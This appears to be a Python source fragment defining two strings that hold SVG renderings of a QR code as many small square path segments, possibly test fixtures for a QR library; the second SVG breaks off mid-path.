rt = """<svg height="17.4mm" version="1.1" viewBox="0 0 17.4 17.4" width="17.4mm" xmlns="http://www.w3.org/2000/svg"><path d="M 12 6 L 12 6.6 L 12.6 6.6 L 12.6 6 z M 10.8 12.6 L 10.8 13.2 L 11.4 13.2 L 11.4 12.6 z M 9.6 3 L 9.6 3.6 L 10.2 3.6 L 10.2 3 z M 8.4 12.6 L 8.4 13.2 L 9.0 13.2 L 9.0 12.6 z M 2.4 14.4 L 2.4 15.0 L 3.0 15.0 L 3.0 14.4 z M 12 7.8 L 12 8.4 L 12.6 8.4 L 12.6 7.8 z M 10.8 4.8 L 10.8 5.4 L 11.4 5.4 L 11.4 4.8 z M 13.2 4.8 L 13.2 5.4 L 13.8 5.4 L 13.8 4.8 z M 10.2 12.6 L 10.2 13.2 L 10.8 13.2 L 10.8 12.6 z M 3 6 L 3 6.6 L 3.6 6.6 L 3.6 6 z M 2.4 8.4 L 2.4 9.0 L 3.0 9.0 L 3.0 8.4 z M 13.2 13.8 L 13.2 14.4 L 13.8 14.4 L 13.8 13.8 z M 7.2 5.4 L 7.2 6.0 L 7.8 6.0 L 7.8 5.4 z M 5.4 7.2 L 5.4 7.8 L 6.0 7.8 L 6.0 7.2 z M 4.8 2.4 L 4.8 3.0 L 5.4 3.0 L 5.4 2.4 z M 8.4 7.2 L 8.4 7.8 L 9.0 7.8 L 9.0 7.2 z M 7.8 2.4 L 7.8 3.0 L 8.4 3.0 L 8.4 2.4 z M 8.4 6.6 L 8.4 7.2 L 9.0 7.2 L 9.0 6.6 z M 12 4.2 L 12 4.8 L 12.6 4.8 L 12.6 4.2 z M 6 8.4 L 6 9.0 L 6.6 9.0 L 6.6 8.4 z M 9.6 6 L 9.6 6.6 L 10.2 6.6 L 10.2 6 z M 13.8 10.8 L 13.8 11.4 L 14.4 11.4 L 14.4 10.8 z M 12.6 3.6 L 12.6 4.2 L 13.2 4.2 L 13.2 3.6 z M 2.4 12.6 L 2.4 13.2 L 3.0 13.2 L 3.0 12.6 z M 10.8 3 L 10.8 3.6 L 11.4 3.6 L 11.4 3 z M 14.4 7.8 L 14.4 8.4 L 15.0 8.4 L 15.0 7.8 z M 13.2 7.8 L 13.2 8.4 L 13.8 8.4 L 13.8 7.8 z M 2.4 4.8 L 2.4 5.4 L 3.0 5.4 L 3.0 4.8 z M 14.4 4.8 L 14.4 5.4 L 15.0 5.4 L 15.0 4.8 z M 7.2 11.4 L 7.2 12.0 L 7.8 12.0 L 7.8 11.4 z M 4.8 8.4 L 4.8 9.0 L 5.4 9.0 L 5.4 8.4 z M 4.2 3.6 L 4.2 4.2 L 4.8 4.2 L 4.8 3.6 z M 3.6 6 L 3.6 6.6 L 4.2 6.6 L 4.2 6 z M 7.8 10.8 L 7.8 11.4 L 8.4 11.4 L 8.4 10.8 z M 7.2 3.6 L 7.2 4.2 L 7.8 4.2 L 7.8 3.6 z M 6 2.4 L 6 3.0 L 6.6 3.0 L 6.6 2.4 z M 4.8 12 L 4.8 12.6 L 5.4 12.6 L 5.4 12 z M 9 2.4 L 9 3.0 L 9.6 3.0 L 9.6 2.4 z M 7.8 12 L 7.8 12.6 L 8.4 12.6 L 8.4 12 z M 12 2.4 L 12 3.0 L 12.6 3.0 L 12.6 2.4 z M 12.6 10.2 L 12.6 10.8 L 13.2 10.8 L 13.2 10.2 z M 12 13.8 L 12 14.4 L 12.6 14.4 L 12.6 13.8 z M 10.8 3.6 L 10.8 4.2 L 11.4 4.2 L 11.4 3.6 z M 10.2 8.4 L 10.2 9.0 L 10.8 9.0 L 10.8 8.4 z M 3.6 12.6 L 3.6 13.2 L 4.2 13.2 L 4.2 12.6 z M 13.2 8.4 L 13.2 9.0 L 13.8 9.0 L 13.8 8.4 z M 2.4 3 L 2.4 3.6 L 3.0 3.6 L 3.0 3 z M 3 9.6 L 3 10.2 L 3.6 10.2 L 3.6 9.6 z M 7.2 9.6 L 7.2 10.2 L 7.8 10.2 L 7.8 9.6 z M 5.4 10.8 L 5.4 11.4 L 6.0 11.4 L 6.0 10.8 z M 4.2 13.2 L 4.2 13.8 L 4.8 13.8 L 4.8 13.2 z M 7.2 13.2 L 7.2 13.8 L 7.8 13.8 L 7.8 13.2 z M 9 11.4 L 9 12.0 L 9.6 12.0 L 9.6 11.4 z M 7.8 13.8 L 7.8 14.4 L 8.4 14.4 L 8.4 13.8 z M 11.4 12 L 11.4 12.6 L 12.0 12.6 L 12.0 12 z M 10.8 7.2 L 10.8 7.8 L 11.4 7.8 L 11.4 7.2 z M 6 12 L 6 12.6 L 6.6 12.6 L 6.6 12 z M 9.6 7.2 L 9.6 7.8 L 10.2 7.8 L 10.2 7.2 z M 14.4 12 L 14.4 12.6 L 15.0 12.6 L 15.0 12 z M 13.2 2.4 L 13.2 3.0 L 13.8 3.0 L 13.8 2.4 z M 12.6 7.2 L 12.6 7.8 L 13.2 7.8 L 13.2 7.2 z M 14.4 4.2 L 14.4 4.8 L 15.0 4.8 L 15.0 4.2 z M 3.6 13.2 L 3.6 13.8 L 4.2 13.8 L 4.2 13.2 z M 13.2 11.4 L 13.2 12.0 L 13.8 12.0 L 13.8 11.4 z M 2.4 10.8 L 2.4 11.4 L 3.0 11.4 L 3.0 10.8 z M 3.6 9.6 L 3.6 10.2 L 4.2 10.2 L 4.2 9.6 z M 4.2 12.6 L 4.2 13.2 L 4.8 13.2 L 4.8 12.6 z M 6 10.8 L 6 11.4 L 6.6 11.4 L 6.6 10.8 z M 9 8.4 L 9 9.0 L 9.6 9.0 L 9.6 8.4 z M 12.6 6 L 12.6 6.6 L 13.2 6.6 L 13.2 6 z M 10.8 5.4 L 10.8 6.0 L 11.4 6.0 L 11.4 5.4 z M 9.6 10.2 L 9.6 10.8 L 10.2 10.8 L 10.2 10.2 z M 12.6 9 L 12.6 9.6 L 13.2 9.6 L 13.2 9 z M 11.4 2.4 L 11.4 3.0 L 12.0 3.0 L 12.0 2.4 z M 14.4 2.4 L 14.4 3.0 L 15.0 3.0 L 15.0 2.4 z M 2.4 9 L 2.4 9.6 L 3.0 9.6 L 3.0 9 z M 4.2 6 L 4.2 6.6 L 4.8 6.6 L 4.8 6 z M 3.6 3.6 L 3.6 4.2 L 4.2 4.2 L 4.2 3.6 z M 3 8.4 L 3 9.0 L 
3.6 9.0 L 3.6 8.4 z M 7.2 6 L 7.2 6.6 L 7.8 6.6 L 7.8 6 z M 7.8 6.6 L 7.8 7.2 L 8.4 7.2 L 8.4 6.6 z M 6 4.8 L 6 5.4 L 6.6 5.4 L 6.6 4.8 z M 9 4.8 L 9 5.4 L 9.6 5.4 L 9.6 4.8 z M 8.4 4.8 L 8.4 5.4 L 9.0 5.4 L 9.0 4.8 z M 7.8 14.4 L 7.8 15.0 L 8.4 15.0 L 8.4 14.4 z M 12 4.8 L 12 5.4 L 12.6 5.4 L 12.6 4.8 z M 9.6 6.6 L 9.6 7.2 L 10.2 7.2 L 10.2 6.6 z M 2.4 13.2 L 2.4 13.8 L 3.0 13.8 L 3.0 13.2 z M 10.8 6 L 10.8 6.6 L 11.4 6.6 L 11.4 6 z M 9.6 13.2 L 9.6 13.8 L 10.2 13.8 L 10.2 13.2 z M 13.2 6 L 13.2 6.6 L 13.8 6.6 L 13.8 6 z M 2.4 5.4 L 2.4 6.0 L 3.0 6.0 L 3.0 5.4 z M 10.2 13.8 L 10.2 14.4 L 10.8 14.4 L 10.8 13.8 z M 14.4 5.4 L 14.4 6.0 L 15.0 6.0 L 15.0 5.4 z M 3 2.4 L 3 3.0 L 3.6 3.0 L 3.6 2.4 z M 2.4 7.2 L 2.4 7.8 L 3.0 7.8 L 3.0 7.2 z M 7.8 10.2 L 7.8 10.8 L 8.4 10.8 L 8.4 10.2 z M 7.2 4.2 L 7.2 4.8 L 7.8 4.8 L 7.8 4.2 z M 4.8 6 L 4.8 6.6 L 5.4 6.6 L 5.4 6 z M 6 3 L 6 3.6 L 6.6 3.6 L 6.6 3 z M 4.8 12.6 L 4.8 13.2 L 5.4 13.2 L 5.4 12.6 z M 10.8 9.6 L 10.8 10.2 L 11.4 10.2 L 11.4 9.6 z M 5.4 14.4 L 5.4 15.0 L 6.0 15.0 L 6.0 14.4 z M 9.6 4.8 L 9.6 5.4 L 10.2 5.4 L 10.2 4.8 z M 6 14.4 L 6 15.0 L 6.6 15.0 L 6.6 14.4 z M 8.4 14.4 L 8.4 15.0 L 9.0 15.0 L 9.0 14.4 z M 9 14.4 L 9 15.0 L 9.6 15.0 L 9.6 14.4 z M 11.4 7.8 L 11.4 8.4 L 12.0 8.4 L 12.0 7.8 z M 10.8 4.2 L 10.8 4.8 L 11.4 4.8 L 11.4 4.2 z M 10.2 7.8 L 10.2 8.4 L 10.8 8.4 L 10.8 7.8 z M 12 14.4 L 12 15.0 L 12.6 15.0 L 12.6 14.4 z M 13.2 9 L 13.2 9.6 L 13.8 9.6 L 13.8 9 z M 2.4 3.6 L 2.4 4.2 L 3.0 4.2 L 3.0 3.6 z M 12.6 12.6 L 12.6 13.2 L 13.2 13.2 L 13.2 12.6 z M 7.2 10.2 L 7.2 10.8 L 7.8 10.8 L 7.8 10.2 z M 4.8 7.2 L 4.8 7.8 L 5.4 7.8 L 5.4 7.2 z M 4.2 2.4 L 4.2 3.0 L 4.8 3.0 L 4.8 2.4 z M 3.6 7.2 L 3.6 7.8 L 4.2 7.8 L 4.2 7.2 z M 7.8 7.2 L 7.8 7.8 L 8.4 7.8 L 8.4 7.2 z M 8.4 11.4 L 8.4 12.0 L 9.0 12.0 L 9.0 11.4 z M 6 3.6 L 6 4.2 L 6.6 4.2 L 6.6 3.6 z M 7.8 13.2 L 7.8 13.8 L 8.4 13.8 L 8.4 13.2 z M 10.8 7.8 L 10.8 8.4 L 11.4 8.4 L 11.4 7.8 z M 6 12.6 L 6 13.2 L 6.6 13.2 L 6.6 12.6 z M 9.6 7.8 L 9.6 8.4 L 10.2 8.4 L 10.2 7.8 z M 3 14.4 L 3 15.0 L 3.6 15.0 L 3.6 14.4 z M 12.6 11.4 L 12.6 12.0 L 13.2 12.0 L 13.2 11.4 z M 12 12.6 L 12 13.2 L 12.6 13.2 L 12.6 12.6 z M 10.2 9.6 L 10.2 10.2 L 10.8 10.2 L 10.8 9.6 z M 14.4 9.6 L 14.4 10.2 L 15.0 10.2 L 15.0 9.6 z M 9.6 14.4 L 9.6 15.0 L 10.2 15.0 L 10.2 14.4 z M 2.4 11.4 L 2.4 12.0 L 3.0 12.0 L 3.0 11.4 z M 4.2 8.4 L 4.2 9.0 L 4.8 9.0 L 4.8 8.4 z M 3 10.8 L 3 11.4 L 3.6 11.4 L 3.6 10.8 z M 7.8 9 L 7.8 9.6 L 8.4 9.6 L 8.4 9 z M 5.4 2.4 L 5.4 3.0 L 6.0 3.0 L 6.0 2.4 z M 4.2 12 L 4.2 12.6 L 4.8 12.6 L 4.8 12 z M 8.4 2.4 L 8.4 3.0 L 9.0 3.0 L 9.0 2.4 z M 7.2 12 L 7.2 12.6 L 7.8 12.6 L 7.8 12 z M 6 11.4 L 6 12.0 L 6.6 12.0 L 6.6 11.4 z M 12 9 L 12 9.6 L 12.6 9.6 L 12.6 9 z M 10.8 8.4 L 10.8 9.0 L 11.4 9.0 L 11.4 8.4 z M 6 13.2 L 6 13.8 L 6.6 13.8 L 6.6 13.2 z M 9.6 10.8 L 9.6 11.4 L 10.2 11.4 L 10.2 10.8 z M 13.8 6 L 13.8 6.6 L 14.4 6.6 L 14.4 6 z M 13.2 3.6 L 13.2 4.2 L 13.8 4.2 L 13.8 3.6 z M 12.6 8.4 L 12.6 9.0 L 13.2 9.0 L 13.2 8.4 z M 10.2 11.4 L 10.2 12.0 L 10.8 12.0 L 10.8 11.4 z M 14.4 3 L 14.4 3.6 L 15.0 3.6 L 15.0 3 z M 3.6 14.4 L 3.6 15.0 L 4.2 15.0 L 4.2 14.4 z M 4.2 7.8 L 4.2 8.4 L 4.8 8.4 L 4.8 7.8 z M 3.6 4.2 L 3.6 4.8 L 4.2 4.8 L 4.2 4.2 z M 7.2 6.6 L 7.2 7.2 L 7.8 7.2 L 7.8 6.6 z M 4.8 3.6 L 4.8 4.2 L 5.4 4.2 L 5.4 3.6 z M 3.6 10.8 L 3.6 11.4 L 4.2 11.4 L 4.2 10.8 z M 6 5.4 L 6 6.0 L 6.6 6.0 L 6.6 5.4 z M 9 6.6 L 9 7.2 L 9.6 7.2 L 9.6 6.6 z M 8.4 5.4 L 8.4 6.0 L 9.0 6.0 L 9.0 5.4 z M 6 7.2 L 6 7.8 L 6.6 7.8 L 6.6 7.2 z M 10.8 12 L 10.8 12.6 L 11.4 12.6 L 11.4 12 z M 13.8 12 L 13.8 
12.6 L 14.4 12.6 L 14.4 12 z M 12.6 2.4 L 12.6 3.0 L 13.2 3.0 L 13.2 2.4 z M 12 7.2 L 12 7.8 L 12.6 7.8 L 12.6 7.2 z M 2.4 13.8 L 2.4 14.4 L 3.0 14.4 L 3.0 13.8 z M 9.6 13.8 L 9.6 14.4 L 10.2 14.4 L 10.2 13.8 z M 2.4 6 L 2.4 6.6 L 3.0 6.6 L 3.0 6 z M 11.4 6 L 11.4 6.6 L 12.0 6.6 L 12.0 6 z M 14.4 6 L 14.4 6.6 L 15.0 6.6 L 15.0 6 z M 13.2 13.2 L 13.2 13.8 L 13.8 13.8 L 13.8 13.2 z M 4.2 4.8 L 4.2 5.4 L 4.8 5.4 L 4.8 4.8 z M 3.6 4.8 L 3.6 5.4 L 4.2 5.4 L 4.2 4.8 z M 7.8 9.6 L 7.8 10.2 L 8.4 10.2 L 8.4 9.6 z M 7.2 4.8 L 7.2 5.4 L 7.8 5.4 L 7.8 4.8 z M 8.4 9 L 8.4 9.6 L 9.0 9.6 L 9.0 9 z M 6 6 L 6 6.6 L 6.6 6.6 L 6.6 6 z M 5.4 6 L 5.4 6.6 L 6.0 6.6 L 6.0 6 z M 4.8 13.2 L 4.8 13.8 L 5.4 13.8 L 5.4 13.2 z M 9 3.6 L 9 4.2 L 9.6 4.2 L 9.6 3.6 z M 8.4 6 L 8.4 6.6 L 9.0 6.6 L 9.0 6 z M 12 3.6 L 12 4.2 L 12.6 4.2 L 12.6 3.6 z M 9.6 5.4 L 9.6 6.0 L 10.2 6.0 L 10.2 5.4 z M 12.6 4.2 L 12.6 4.8 L 13.2 4.8 L 13.2 4.2 z M 11.4 7.2 L 11.4 7.8 L 12.0 7.8 L 12.0 7.2 z M 10.8 2.4 L 10.8 3.0 L 11.4 3.0 L 11.4 2.4 z M 2.4 12 L 2.4 12.6 L 3.0 12.6 L 3.0 12 z M 9.6 12 L 9.6 12.6 L 10.2 12.6 L 10.2 12 z M 13.8 2.4 L 13.8 3.0 L 14.4 3.0 L 14.4 2.4 z M 13.2 7.2 L 13.2 7.8 L 13.8 7.8 L 13.8 7.2 z M 2.4 4.2 L 2.4 4.8 L 3.0 4.8 L 3.0 4.2 z M 4.2 10.8 L 4.2 11.4 L 4.8 11.4 L 4.8 10.8 z M 4.8 7.8 L 4.8 8.4 L 5.4 8.4 L 5.4 7.8 z M 4.2 4.2 L 4.2 4.8 L 4.8 4.8 L 4.8 4.2 z M 3.6 7.8 L 3.6 8.4 L 4.2 8.4 L 4.2 7.8 z M 7.8 11.4 L 7.8 12.0 L 8.4 12.0 L 8.4 11.4 z M 5.4 9.6 L 5.4 10.2 L 6.0 10.2 L 6.0 9.6 z M 4.8 4.8 L 4.8 5.4 L 5.4 5.4 L 5.4 4.8 z M 4.2 14.4 L 4.2 15.0 L 4.8 15.0 L 4.8 14.4 z M 8.4 9.6 L 8.4 10.2 L 9.0 10.2 L 9.0 9.6 z M 7.2 14.4 L 7.2 15.0 L 7.8 15.0 L 7.8 14.4 z M 6 4.2 L 6 4.8 L 6.6 4.8 L 6.6 4.2 z M 7.8 12.6 L 7.8 13.2 L 8.4 13.2 L 8.4 12.6 z M 11.4 13.2 L 11.4 13.8 L 12.0 13.8 L 12.0 13.2 z M 10.8 10.8 L 10.8 11.4 L 11.4 11.4 L 11.4 10.8 z M 13.8 8.4 L 13.8 9.0 L 14.4 9.0 L 14.4 8.4 z M 11.4 11.4 L 11.4 12.0 L 12.0 12.0 L 12.0 11.4 z M 10.2 9 L 10.2 9.6 L 10.8 9.6 L 10.8 9 z M 3.6 12 L 3.6 12.6 L 4.2 12.6 L 4.2 12 z M 2.4 2.4 L 2.4 3.0 L 3.0 3.0 L 3.0 2.4 z M 12.6 13.8 L 12.6 14.4 L 13.2 14.4 L 13.2 13.8 z M 4.8 10.8 L 4.8 11.4 L 5.4 11.4 L 5.4 10.8 z M 8.4 3 L 8.4 3.6 L 9.0 3.6 L 9.0 3 z M 7.2 12.6 L 7.2 13.2 L 7.8 13.2 L 7.8 12.6 z M 6 9.6 L 6 10.2 L 6.6 10.2 L 6.6 9.6 z M 10.8 14.4 L 10.8 15.0 L 11.4 15.0 L 11.4 14.4 z M 4.8 14.4 L 4.8 15.0 L 5.4 15.0 L 5.4 14.4 z M 9 9.6 L 9 10.2 L 9.6 10.2 L 9.6 9.6 z M 13.8 14.4 L 13.8 15.0 L 14.4 15.0 L 14.4 14.4 z M 12.6 4.8 L 12.6 5.4 L 13.2 5.4 L 13.2 4.8 z M 6.6 7.8 L 6.6 8.4 L 7.2 8.4 L 7.2 7.8 z M 11.4 12.6 L 11.4 13.2 L 12.0 13.2 L 12.0 12.6 z M 6 13.8 L 6 14.4 L 6.6 14.4 L 6.6 13.8 z M 9.6 11.4 L 9.6 12.0 L 10.2 12.0 L 10.2 11.4 z M 13.2 4.2 L 13.2 4.8 L 13.8 4.8 L 13.8 4.2 z M 12.6 7.8 L 12.6 8.4 L 13.2 8.4 L 13.2 7.8 z M 14.4 3.6 L 14.4 4.2 L 15.0 4.2 L 15.0 3.6 z M 13.2 10.8 L 13.2 11.4 L 13.8 11.4 L 13.8 10.8 z M 4.2 7.2 L 4.2 7.8 L 4.8 7.8 L 4.8 7.2 z M 3.6 2.4 L 3.6 3.0 L 4.2 3.0 L 4.2 2.4 z M 4.8 4.2 L 4.8 4.8 L 5.4 4.8 L 5.4 4.2 z M 7.8 5.4 L 7.8 6.0 L 8.4 6.0 L 8.4 5.4 z" id="qr-path" style="fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:none"></path></svg>"""
rs = """<svg height="34.8mm" version="1.1" viewBox="0 0 34.8 34.8" width="34.8mm" xmlns="http://www.w3.org/2000/svg"><path d="M 24 12 L 24 13.2 L 25.2 13.2 L 25.2 12 z M 21.6 25.2 L 21.6 26.4 L 22.8 26.4 L 22.8 25.2 z M 19.2 6 L 19.2 7.2 L 20.4 7.2 L 20.4 6 z M 16.8 25.2 L 16.8 26.4 L 18.0 26.4 L 18.0 25.2 z M 4.8 28.8 L 4.8 30.0 L 6.0 30.0 L 6.0 28.8 z M 24 15.6 L 24 16.8 L 25.2 16.8 L 25.2 15.6 z M 21.6 9.6 L 21.6 10.8 L 22.8 10.8 L 22.8 9.6 z M 26.4 9.6 L 26.4 10.8 L 27.6 10.8 L 27.6 9.6 z M 20.4 25.2 L 20.4 26.4 L 21.6 26.4 L 21.6 25.2 z M 6 12 L 6 13.2 L 7.2 13.2 L 7.2 12 z M 4.8 16.8 L 4.8 18.0 L 6.0 18.0 L 6.0 16.8 z M 26.4 27.6 L 26.4 28.8 L 27.6 28.8 L 27.6 27.6 z M 14.4 10.8 L 14.4 12.0 L 15.6 12.0 L 15.6 10.8 z M 10.8 14.4 L 10.8 15.6 L 12.0 15.6 L 12.0 14.4 z M 9.6 4.8 L 9.6 6.0 L 10.8 6.0 L 10.8 4.8 z M 16.8 14.4 L 16.8 15.6 L 18.0 15.6 L 18.0 14.4 z M 15.6 4.8 L 15.6 6.0 L 16.8 6.0 L 16.8 4.8 z M 16.8 13.2 L 16.8 14.4 L 18.0 14.4 L 18.0 13.2 z M 24 8.4 L 24 9.6 L 25.2 9.6 L 25.2 8.4 z M 12 16.8 L 12 18.0 L 13.2 18.0 L 13.2 16.8 z M 19.2 12 L 19.2 13.2 L 20.4 13.2 L 20.4 12 z M 27.6 21.6 L 27.6 22.8 L 28.8 22.8 L 28.8 21.6 z M 25.2 7.2 L 25.2 8.4 L 26.4 8.4 L 26.4 7.2 z M 4.8 25.2 L 4.8 26.4 L 6.0 26.4 L 6.0 25.2 z M 21.6 6 L 21.6 7.2 L 22.8 7.2 L 22.8 6 z M 28.8 15.6 L 28.8 16.8 L 30.0 16.8 L 30.0 15.6 z M 26.4 15.6 L 26.4 16.8 L 27.6 16.8 L 27.6 15.6 z M 4.8 9.6 L 4.8 10.8 L 6.0 10.8 L 6.0 9.6 z M 28.8 9.6 L 28.8 10.8 L 30.0 10.8 L 30.0 9.6 z M 14.4 22.8 L 14.4 24.0 L 15.6 24.0 L 15.6 22.8 z M 9.6 16.8 L 9.6 18.0 L 10.8 18.0 L 10.8 16.8 z M 8.4 7.2 L 8.4 8.4 L 9.6 8.4 L 9.6 7.2 z M 7.2 12 L 7.2 13.2 L 8.4 13.2 L 8.4 12 z M 15.6 21.6 L 15.6 22.8 L 16.8 22.8 L 16.8 21.6 z M 14.4 7.2 L 14.4 8.4 L 15.6 8.4 L 15.6 7.2 z M 12 4.8 L 12 6.0 L 13.2 6.0 L 13.2 4.8 z M 9.6 24 L 9.6 25.2 L 10.8 25.2 L 10.8 24 z M 18 4.8 L 18 6.0 L 19.2 6.0 L 19.2 4.8 z M 15.6 24 L 15.6 25.2 L 16.8 25.2 L 16.8 24 z M 24 4.8 L 24 6.0 L 25.2 6.0 L 25.2 4.8 z M 25.2 20.4 L 25.2 21.6 L 26.4 21.6 L 26.4 20.4 z M 24 27.6 L 24 28.8 L 25.2 28.8 L 25.2 27.6 z M 21.6 7.2 L 21.6 8.4 L 22.8 8.4 L 22.8 7.2 z M 20.4 16.8 L 20.4 18.0 L 21.6 18.0 L 21.6 16.8 z M 7.2 25.2 L 7.2 26.4 L 8.4 26.4 L 8.4 25.2 z M 26.4 16.8 L 26.4 18.0 L 27.6 18.0 L 27.6 16.8 z M 4.8 6 L 4.8 7.2 L 6.0 7.2 L 6.0 6 z M 6 19.2 L 6 20.4 L 7.2 20.4 L 7.2 19.2 z M 14.4 19.2 L 14.4 20.4 L 15.6 20.4 L 15.6 19.2 z M 10.8 21.6 L 10.8 22.8 L 12.0 22.8 L 12.0 21.6 z M 8.4 26.4 L 8.4 27.6 L 9.6 27.6 L 9.6 26.4 z M 14.4 26.4 L 14.4 27.6 L 15.6 27.6 L 15.6 26.4 z M 18 22.8 L 18 24.0 L 19.2 24.0 L 19.2 22.8 z M 15.6 27.6 L 15.6 28.8 L 16.8 28.8 L 16.8 27.6 z M 22.8 24 L 22.8 25.2 L 24.0 25.2 L 24.0 24 z M 21.6 14.4 L 21.6 15.6 L 22.8 15.6 L 22.8 14.4 z M 12 24 L 12 25.2 L 13.2 25.2 L 13.2 24 z M 19.2 14.4 L 19.2 15.6 L 20.4 15.6 L 20.4 14.4 z M 28.8 24 L 28.8 25.2 L 30.0 25.2 L 30.0 24 z M 26.4 4.8 L 26.4 6.0 L 27.6 6.0 L 27.6 4.8 z M 25.2 14.4 L 25.2 15.6 L 26.4 15.6 L 26.4 14.4 z M 28.8 8.4 L 28.8 9.6 L 30.0 9.6 L 30.0 8.4 z M 7.2 26.4 L 7.2 27.6 L 8.4 27.6 L 8.4 26.4 z M 26.4 22.8 L 26.4 24.0 L 27.6 24.0 L 27.6 22.8 z M 4.8 21.6 L 4.8 22.8 L 6.0 22.8 L 6.0 21.6 z M 7.2 19.2 L 7.2 20.4 L 8.4 20.4 L 8.4 19.2 z M 8.4 25.2 L 8.4 26.4 L 9.6 26.4 L 9.6 25.2 z M 12 21.6 L 12 22.8 L 13.2 22.8 L 13.2 21.6 z M 18 16.8 L 18 18.0 L 19.2 18.0 L 19.2 16.8 z M 25.2 12 L 25.2 13.2 L 26.4 13.2 L 26.4 12 z M 21.6 10.8 L 21.6 12.0 L 22.8 12.0 L 22.8 10.8 z M 19.2 20.4 L 19.2 21.6 L 20.4 21.6 L 20.4 20.4 z M 25.2 18 L 25.2 19.2 L 26.4 19.2 L 26.4 18 z M 22.8 4.8 L 22.8 6.0 L 
24.0 6.0 L 24.0 4.8 z M 28.8 4.8 L 28.8 6.0 L 30.0 6.0 L 30.0 4.8 z M 4.8 18 L 4.8 19.2 L 6.0 19.2 L 6.0 18 z M 8.4 12 L 8.4 13.2 L 9.6 13.2 L 9.6 12 z M 7.2 7.2 L 7.2 8.4 L 8.4 8.4 L 8.4 7.2 z M 6 16.8 L 6 18.0 L 7.2 18.0 L 7.2 16.8 z M 14.4 12 L 14.4 13.2 L 15.6 13.2 L 15.6 12 z M 15.6 13.2 L 15.6 14.4 L 16.8 14.4 L 16.8 13.2 z M 12 9.6 L 12 10.8 L 13.2 10.8 L 13.2 9.6 z M 18 9.6 L 18 10.8 L 19.2 10.8 L 19.2 9.6 z M 16.8 9.6 L 16.8 10.8 L 18.0 10.8 L 18.0 9.6 z M 15.6 28.8 L 15.6 30.0 L 16.8 30.0 L 16.8 28.8 z M 24 9.6 L 24 10.8 L 25.2 10.8 L 25.2 9.6 z M 19.2 13.2 L 19.2 14.4 L 20.4 14.4 L 20.4 13.2 z M 4.8 26.4 L 4.8 27.6 L 6.0 27.6 L 6.0 26.4 z M 21.6 12 L 21.6 13.2 L 22.8 13.2 L 22.8 12 z M 19.2 26.4 L 19.2 27.6 L 20.4 27.6 L 20.4 26.4 z M 26.4 12 L 26.4 13.2 L 27.6 13.2 L 27.6 12 z M 4.8 10.8 L 4.8 12.0 L 6.0 12.0 L 6.0 10.8 z M 20.4 27.6 L 20.4 28.8 L 21.6 28.8 L 21.6 27.6 z M 28.8 10.8 L 28.8 12.0 L 30.0 12.0 L 30.0 10.8 z M 6 4.8 L 6 6.0 L 7.2 6.0 L 7.2 4.8 z M 4.8 14.4 L 4.8 15.6 L 6.0 15.6 L 6.0 14.4 z M 15.6 20.4 L 15.6 21.6 L 16.8 21.6 L 16.8 20.4 z M 14.4 8.4 L 14.4 9.6 L 15.6 9.6 L 15.6 8.4 z M 9.6 12 L 9.6 13.2 L 10.8 13.2 L 10.8 12 z M 12 6 L 12 7.2 L 13.2 7.2 L 13.2 6 z M 9.6 25.2 L 9.6 26.4 L 10.8 26.4 L 10.8 25.2 z M 21.6 19.2 L 21.6 20.4 L 22.8 20.4 L 22.8 19.2 z M 10.8 28.8 L 10.8 30.0 L 12.0 30.0 L 12.0 28.8 z M 19.2 9.6 L 19.2 10.8 L 20.4 10.8 L 20.4 9.6 z M 12 28.8 L 12 30.0 L 13.2 30.0 L 13.2 28.8 z M 16.8 28.8 L 16.8 30.0 L 18.0 30.0 L 18.0 28.8 z M 18 28.8 L 18 30.0 L 19.2 30.0 L 19.2 28.8 z M 22.8 15.6 L 22.8 16.8 L 24.0 16.8 L 24.0 15.6 z M 21.6 8.4 L 21.6 9.6 L 22.8 9.6 L 22.8 8.4 z M 20.4 15.6 L 20.4 16.8 L 21.6 16.8 L 21.6 15.6 z M 24 28.8 L 24 30.0 L 25.2 30.0 L 25.2 28.8 z M 26.4 18 L 26.4 19.2 L 27.6 19.2 L 27.6 18 z M 4.8 7.2 L 4.8 8.4 L 6.0 8.4 L 6.0 7.2 z M 25.2 25.2 L 25.2 26.4 L 26.4 26.4 L 26.4 25.2 z M 14.4 20.4 L 14.4 21.6 L 15.6 21.6 L 15.6 20.4 z M 9.6 14.4 L 9.6 15.6 L 10.8 15.6 L 10.8 14.4 z M 8.4 4.8 L 8.4 6.0 L 9.6 6.0 L 9.6 4.8 z M 7.2 14.4 L 7.2 15.6 L 8.4 15.6 L 8.4 14.4 z M 15.6 14.4 L 15.6 15.6 L 16.8 15.6 L 16.8 14.4 z M 16.8 22.8 L 16.8 24.0 L 18.0 24.0 L 18.0 22.8 z M 12 7.2 L 12 8.4 L 13.2 8.4 L 13.2 7.2 z M 15.6 26.4 L 15.6 27.6 L 16.8 27.6 L 16.8 26.4 z M 21.6 15.6 L 21.6 16.8 L 22.8 16.8 L 22.8 15.6 z M 12 25.2 L 12 26.4 L 13.2 26.4 L 13.2 25.2 z M 19.2 15.6 L 19.2 16.8 L 20.4 16.8 L 20.4 15.6 z M 6 28.8 L 6 30.0 L 7.2 30.0 L 7.2 28.8 z M 25.2 22.8 L 25.2 24.0 L 26.4 24.0 L 26.4 22.8 z M 24 25.2 L 24 26.4 L 25.2 26.4 L 25.2 25.2 z M 20.4 19.2 L 20.4 20.4 L 21.6 20.4 L 21.6 19.2 z M 28.8 19.2 L 28.8 20.4 L 30.0 20.4 L 30.0 19.2 z M 19.2 28.8 L 19.2 30.0 L 20.4 30.0 L 20.4 28.8 z M 4.8 22.8 L 4.8 24.0 L 6.0 24.0 L 6.0 22.8 z M 8.4 16.8 L 8.4 18.0 L 9.6 18.0 L 9.6 16.8 z M 6 21.6 L 6 22.8 L 7.2 22.8 L 7.2 21.6 z M 15.6 18 L 15.6 19.2 L 16.8 19.2 L 16.8 18 z M 10.8 4.8 L 10.8 6.0 L 12.0 6.0 L 12.0 4.8 z M 8.4 24 L 8.4 25.2 L 9.6 25.2 L 9.6 24 z M 16.8 4.8 L 16.8 6.0 L 18.0 6.0 L 18.0 4.8 z M 14.4 24 L 14.4 25.2 L 15.6 25.2 L 15.6 24 z M 12 22.8 L 12 24.0 L 13.2 24.0 L 13.2 22.8 z M 24 18 L 24 19.2 L 25.2 19.2 L 25.2 18 z M 21.6 16.8 L 21.6 18.0 L 22.8 18.0 L 22.8 16.8 z M 12 26.4 L 12 27.6 L 13.2 27.6 L 13.2 26.4 z M 19.2 21.6 L 19.2 22.8 L 20.4 22.8 L 20.4 21.6 z M 27.6 12 L 27.6 13.2 L 28.8 13.2 L 28.8 